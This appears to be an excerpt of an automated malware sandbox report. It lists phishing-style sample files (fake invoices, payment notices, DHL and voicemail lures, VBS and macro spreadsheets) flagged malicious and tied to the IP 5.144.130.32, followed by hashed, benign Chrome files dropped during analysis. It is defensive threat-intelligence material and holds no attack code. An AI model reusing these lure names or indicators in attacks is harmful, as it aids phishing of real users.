	Wave Browser_cg5vc6cx_.exe	Get hash	malicious	Browse	5.144.130.32
	#U6807#U724c#U6e2f#U7ec8#U7aef.exe	Get hash	malicious	Browse	5.144.130.32
	ACH Payment.html	Get hash	malicious	Browse	5.144.130.32
	#U260e#Ufe0f PAudioMessage_8211-911.htm	Get hash	malicious	Browse	5.144.130.32
	1.unMineable Miner 1.0.1-beta-packed.exe	Get hash	malicious	Browse	5.144.130.32
	test.html	Get hash	malicious	Browse	5.144.130.32
	PaymentAdvice - Copy.htm	Get hash	malicious	Browse	5.144.130.32
	INVOICE & STATEMENTS -COPY.htm	Get hash	malicious	Browse	5.144.130.32
	DGNTL04052021.2-8864.html	Get hash	malicious	Browse	5.144.130.32
	Notes Received gcgaming.com.html	Get hash	malicious	Browse	5.144.130.32
	Tree Top.html	Get hash	malicious	Browse	5.144.130.32
37f463bf4616ecd445d4a1937da06e19	85095f36_by_Libranalysis.xls	Get hash	malicious	Browse	5.144.130.32
	0b31c0f0_by_Libranalysis.xls	Get hash	malicious	Browse	5.144.130.32
	#Ud83d#Udce0Lori's Fax VM-002.html	Get hash	malicious	Browse	5.144.130.32
	statistic-482095214.xls	Get hash	malicious	Browse	5.144.130.32
	090811fa_by_Libranalysis.xls	Get hash	malicious	Browse	5.144.130.32
	54402971_by_Libranalysis.xls	Get hash	malicious	Browse	5.144.130.32
	afdab907_by_Libranalysis.xls	Get hash	malicious	Browse	5.144.130.32
	8100c344_by_Libranalysis.xls	Get hash	malicious	Browse	5.144.130.32
	32154f4c_by_Libranalysis.xls	Get hash	malicious	Browse	5.144.130.32
	9659e9a8_by_Libranalysis.xls	Get hash	malicious	Browse	5.144.130.32
	46747509_by_Libranalysis.xls	Get hash	malicious	Browse	5.144.130.32
	LMNF434.vbs	Get hash	malicious	Browse	5.144.130.32
	SF65G55121E0FE25552.vbs	Get hash	malicious	Browse	5.144.130.32
	catalog-1908475637.xls	Get hash	malicious	Browse	5.144.130.32
	rF27d1O1O2.exe	Get hash	malicious	Browse	5.144.130.32
	cSvu8bTzJU.exe	Get hash	malicious	Browse	5.144.130.32
	Contract_kyrgyzstan_pdf.exe	Get hash	malicious	Browse	5.144.130.32
	551f47ac_by_Libranalysis.xlsm	Get hash	malicious	Browse	5.144.130.32
	DHL_988121.exe	Get hash	malicious	Browse	5.144.130.32
	DHL_988121.exe	Get hash	malicious	Browse	5.144.130.32

Dropped Files

No context

Created / dropped Files

C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	451603
Entropy (8bit):	5.009711072558331
Encrypted:	false
SSDEEP:	12288:ZHfRTyGZ6lup8Cfrvq4JBPKh+FBlESBw4p6:NfOCzvRKhGvwJ
MD5:	A78AD14E77147E7DE3647E61964C0335
SHA1:	CECC3DD41F4CEA0192B24300C71E1911BD4FCE45
SHA-256:	0D6803758FF8F87081FAFD62E90F0950DFB2DD7991E9607FE76A8F92D0E893FA
SHA-512:	DDE24D5AD50D68FC91E9E325D31E66EF8F624B6BB3A07D14FFED1104D3AB5F4EF1D7969A5CDE0DFBB19CB31C506F7DE97AF67C2F244F7E7E8E10648EA8321101
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	BDic.... ....6...."..Z..4g....6.2...{/...3...5....AF 1363.AF nm.AF pt.AF n1.AF p.AF tc.AF SM.AF M.AF S.AF MS.AF MNR.AF GDS.AF MNT.AF MH.AF MR.AF SZMR.AF MJ.AF MT.AF MY.AF MRZ.AF MN.AF MG.AF RM.AF N.AF MV.AF XM.AF DSM.AF SD.AF G.AF R.AF MNX.AF MRS.AF MD.AF MNRB.AF B.AF ZSMR.AF PM.AF SMNGJ.AF SMN.AF ZMR.AF SMGB.AF MZR.AF GM.AF SMR.AF SMDG.AF RMZ.AF ZM.AF MDG.AF MDT.AF SMNXT.AF SDY.AF LSDG.AF LGDS.AF GLDS.AF UY.AF U.AF DSGNX.AF GNDSX.AF DSG.AF Y.AF GS.AF IEMS.AF YP.AF ZGDRS.AF XGNVDS.AF UT.AF GNDS.AF GVDS.AF MYPS.AF XGNDS.AF TPRY.AF MDSG.AF ZGSDR.AF DYSG.AF PMYTNS.AF AGDS.AF DRZGS.AF PY.AF GSPMDY.AF EGVDS.AF SL.AF GNXDS.AF DSBG.AF IM.AF I.AF MDGS.AF SMY.AF DSGN.AF DSLG.AF GMDS.AF MDSBG.AF SGD.AF IY.AF P.AF DSMG.AF BLZGDRS.AF TR.AF AGSD.AF ZGBDRSL.AF PTRY.AF ASDGV.AF ASM.AF ICANGSD.AF ICAM.AF IKY.AF AMS.AF PMYTRS.AF BZGVDRS.AF SDRBZG.AF GVMDS.AF PSM.AF DGLS.AF GNVXDS.AF AGDSL.AF DGS.AF XDSGNV.AF BZGDRS.AF AM.AF AS.AF A.AF LDSG.AF AGVDS.AF SDG.AF LDSMG.AF EDSMG.AF EY.AF DRSMZG.AF PRYT.AF LZ

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Microsoft Cabinet archive data, 59863 bytes, 1 file
Category:	dropped
Size (bytes):	59863
Entropy (8bit):	7.99556910241083
Encrypted:	true
SSDEEP:	1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
MD5:	15775D95513782F99CDFB17E65DFCEB1
SHA1:	6C11F8BEE799B093F9FF4841E31041B081B23388
SHA-256:	477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
SHA-512:	AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ..~.L.2.L........sx.}...~....$....yy.A.8;....\|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!\|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^aD.....,..]....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D..........2.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.1365884114971383
Encrypted:	false
SSDEEP:	6:kKXdMpkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:OphZkPlE99SNxAhUeSKO
MD5:	2230A6333FB1098E9EA18AAD4899CC5F
SHA1:	BDF07D54DC067BDA7202048ADDF05D92764C91AF
SHA-256:	31B3CC8B92D714E3FBF73F73145AE39BF7D8A8B9432BFE1A1F571F2EF9FB8431
SHA-512:	53F6811CAC218A2321740B1B79014573A92F61738D00F2E680537CF4175F504A2C0D4DE5B19858438740D195D2F332DE073D0C63CCD2DBD447CB7B28A4B28126
Malicious:	false
Reputation:	low
Preview:	p...... .........\|...G..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...

C:\Users\user\AppData\Local\Google\Chrome\User Data\14312168-069c-4fa3-8118-dfd50a673f39.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	95428
Entropy (8bit):	3.749317559672299
Encrypted:	false
SSDEEP:	384:BHdySsPZkvMSVn521NKr/v+G3tGkZH0tGRYrzQSUxb5IIQbrD6xmvbpzgq2WVOg0:t6mRxCSZx82SQef8a70s/DWmKs2WBY
MD5:	8A43E2DE0308F6317FBD3DBCF0D7354B
SHA1:	26B2BB7F3A4869DD2839F27D1C89884783848C0E
SHA-256:	6D257B22862759923CD205858421DF6405365773EBC64544E97D4EF0B023AE65
SHA-512:	6A8B678AA51853003BA6D05AC642C36C2D080F48F40C319677A86ED2B0437520AD835390F68DF652B4C3A124B990894AB4D4649740FD06888A439FB3EDA2AD38
Malicious:	false
Reputation:	low
Preview:	.t.................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....98.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\23bf655f-6599-44fe-a43b-47058c044c59.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SysEx File -
Category:	dropped
Size (bytes):	94708
Entropy (8bit):	3.749461776139014
Encrypted:	false
SSDEEP:	384:RHdySsPZkvMSVn521NKr/v+G3tGkZH0tGRYrzQSUxb5IIQbrD6xmvUzgq2WVOgEu:d6mRxCSZxF2SQef8a70s/DWmKs2WBl
MD5:	D454F10C46614369685F0BB489340CD7
SHA1:	22222C2E89ED7A8E76D7A99B2984A7D120FA1B80
SHA-256:	5E1A9237D97D0B63E1E019970C61F5C1A18DA0DD17356A55F14E3EBD8ADB7304
SHA-512:	397A0DFA49A8724DF26E14D404E55ECFDF6DB421C69CCEAA4E9426994F4A5598C06485CCEE1D8174924089121D86027075EB124A131660CFECF5A173195CD867
Malicious:	false
Reputation:	low
Preview:	.q.................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....98.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\39fc37b9-966b-4ca0-8e62-29a5d4bbb50b.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	92724
Entropy (8bit):	3.7487722495202234
Encrypted:	false
SSDEEP:	384:nHdySsPZYMb21NKr/v+G3tGkZH0tGRYrzQSUxb5IIQbrD6xmvUzgq2WVOgEmNQS2:PmRxCSZxF2SQef8a70s/DWmKs2WBK
MD5:	666ABE3C1898E92F918B935A413949E0
SHA1:	71E2E182F0B30D8B025ED902B8220C5BC1BFB8AC
SHA-256:	4C56052E9EE2601BC603DC09DA26E65C9AD46FF75E25BEB102B25606EB662D73
SHA-512:	003A3255DCB2FBAF5E0C75CAE1A451EF03C9C547E8EA78058694E52AA15739EEBE80CE6196F5707A1F1B59931D6E81E19A9F8F5C5D9F6C906D321E3CE1D4F1EC
Malicious:	false
Reputation:	low
Preview:	0j.................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....98.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\76dfd5d4-1613-4a4b-a2e7-7e29a8e68ee8.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	168979
Entropy (8bit):	6.080962927091102
Encrypted:	false
SSDEEP:	3072:GrToR1HVDHZLeWnVlPVfx2vDFcbXafIB0u1GOJmA3iuRO:m8PVVLRPZ0RaqfIlUOoSiuRO
MD5:	810506B29CCF5492621300A2485B30A2
SHA1:	1CFB8B05E1CB44691C6FFB5732D01A4445D73088
SHA-256:	CD36D527500305CF62D06A375D44AF64B91AA1A7A5E8D36C3FAD2F796268A587
SHA-512:	E817910FA8B7EFE90485C240B27AF140B16B7C3B2B0E3CADA425EE2F58EE740BCE0CD4C668FD78F4640509EA639536D429E72F0FE62466FCCD177844B87E679F
Malicious:	false
Reputation:	low
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.620881525208161e+12,"network":1.620849127e+12,"ticks":96214821.0,"uncertainty":4670888.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016293962"},"plugins":{"metadata":{"adobe-flash-player":{"displ

C:\Users\user\AppData\Local\Google\Chrome\User Data\7d9afb9d-9078-47c1-abcc-16760e26df16.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	160698
Entropy (8bit):	6.051119143193791
Encrypted:	false
SSDEEP:	3072:loR1HVDHZLeWnVlPVfx2vDFcbXafIB0u1GOJmA3iuRO:CPVVLRPZ0RaqfIlUOoSiuRO
MD5:	9FCF6C9734CA7AEC540B11DA85E67B7B
SHA1:	BBA43C882F109A8CB936F6F81232653B0CA1F545
SHA-256:	EF44AAD816D3AD3D89F613D78791969A649D4EE50048B38DA6E9365ABFA98B1B
SHA-512:	5EEFE1102EB74315BCA2BF830AA677641C72A6165A217BFFA7E99004F9FC3FBEE23B26FAB3F4BB39FD0F2DB0A29FE0BA9C110E794E10AA3E60ED5BE32589600C
Malicious:	false
Reputation:	low
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.620881525208161e+12,"network":1.620849127e+12,"ticks":96214821.0,"uncertainty":4670888.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016293962"},"plugins":{"metadata":{"adobe-flash-player":{"displ

C:\Users\user\AppData\Local\Google\Chrome\User Data\9ade6691-5e3a-4a67-a575-69850ea6d644.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	160781
Entropy (8bit):	6.051280650825515
Encrypted:	false
SSDEEP:	3072:yoR1HVDHZLeWnVlPVfx2vDFcbXafIB0u1GOJmA3iuRO:9PVVLRPZ0RaqfIlUOoSiuRO
MD5:	14D1F2AEDB0A4D567AB339A3F8064FC4
SHA1:	DF29B00605C08A55C29FBD3BB558A577D5E854E1
SHA-256:	9BEBA3F16BEAD367C624C437F92E7A73A2CB3B08A829BB7209A489CC2E73763F
SHA-512:	58093C2731281F5E1E64D6A96188340ED3A45433085F7B7E935EB7FC9DE2BA190CDDC960242BE39ABE3D180C914AC851C7BDA2392F96741C0658FA7F0D4B8F59
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.620881525208161e+12,"network":1.620849127e+12,"ticks":96214821.0,"uncertainty":4670888.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016293962"},"plugins":{"metadata":{"adobe-flash-player":{"displ

C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.254162526001658
Encrypted:	false
SSDEEP:	3:FkXft0xE1G1mstft0xE1G1mstft0xE1n:+ftIE1G1mkftIE1G1mkftIE1n
MD5:	E9224A19341F2979669144B01332DF59
SHA1:	F7F760C7104457DF463306A7F7BAE0142EFCEB5B
SHA-256:	47DD519C226D23F203ACAE0EC44DF9BB6208828E24F726E1602EA52F63C3E2BE
SHA-512:	4184302DEB5009D767FECFC150F580DD57D5CF9CF3BFEB7E52C9F3340E5E6499251B9F0DFF37F0454411FED9046880E0A9204312D021294256372C916B8155AC
Malicious:	false
Preview:	sdPC....................s}.....M..2.!..%sdPC....................s}.....M..2.!..%sdPC....................s}.....M..2.!..%

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\0ab0680b-4e1c-4a2b-8b43-c3befe722cea.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	24054
Entropy (8bit):	5.5329951362356855
Encrypted:	false
SSDEEP:	384:smSt8LlUrX51kXqKf/pUZNCgVLH2HfD7rUJHG9XHGlknTrov8K45:PLl251kXqKf/pUZNCgVLH2HfnrUtG93X
MD5:	255F8C328AE2A1A039BC5C4D5999C830
SHA1:	E24B097B85332D09A462E9B7EEE761CCAE454B9C
SHA-256:	4505FFF611412EF5FCBC7018E4E92D5925D37E732607131C5B45C23515635B11
SHA-512:	E07FD9953BBCCACEBC8A3D65DDED4042509468A9F3E818E72DBC8E413F465FDA908CE3407174E06B7D45F793091D984053F35931523502B49CB4DD165D9848CB
Malicious:	false
Preview:	{"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13265355122297996","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\33402a9f-d8e5-410d-b8fa-4032bf492e75.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	24056
Entropy (8bit):	5.532745758893491
Encrypted:	false
SSDEEP:	384:smSt5LlUrX51kXqKf/pUZNCgVLH2HfD7rUJHG9XHGuknTlEo/+8K4F:gLl251kXqKf/pUZNCgVLH2HfnrUtG93a
MD5:	A2A096BFBBD7F370AC524B9681E10EE6
SHA1:	FC61713EAF228ABE9B12600C0BB4887B2385D5F0
SHA-256:	EDCEA7C08CF17D2BA91FC0B36F46A0B06E14B21BC0B03E02006E30D06F0B9CFB
SHA-512:	97D2D79521DCDD2CB4033CC8F5277C5D6A08E0EA373105DBCA0AEF2817EE88047DFA3741070F9D35F7BBB87BBF4B8852AD92643771AAB3141C0EC04A6A3C1613
Malicious:	false
Preview:	{"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13265355122297996","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3075
Entropy (8bit):	4.901265473593167
Encrypted:	false
SSDEEP:	48:Y2twXGDHz5sgRLsVTsn/RSgJ3pTsjHyKsg3zs8Cy/usSkqlsXMHQVs5MHss4MH0M:JOXGDHzLuA4G54HVNCy/kjsGQ+GcGFhH
MD5:	E36B742BAC2575D1BB3029EB66DFC6D8
SHA1:	25D9CEE60ECC682E8A24572073519BA1AA6BD32C
SHA-256:	3836269AEC082AC3D2CE58B7A28DD59A344D11993EFD008A0E48AC5D7E74BC2D
SHA-512:	846D708B869DA87D1FBFE2E559132044C8F8EDB5A36B451EF4F9052170E0833A8E7305279A3F8B19F51E6E931AB6107C7B6003E063E90B3AE0619818A410E6A1
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13267947126842403","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://accounts.google.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13267947126868170","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://redirector.gvt1.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"exp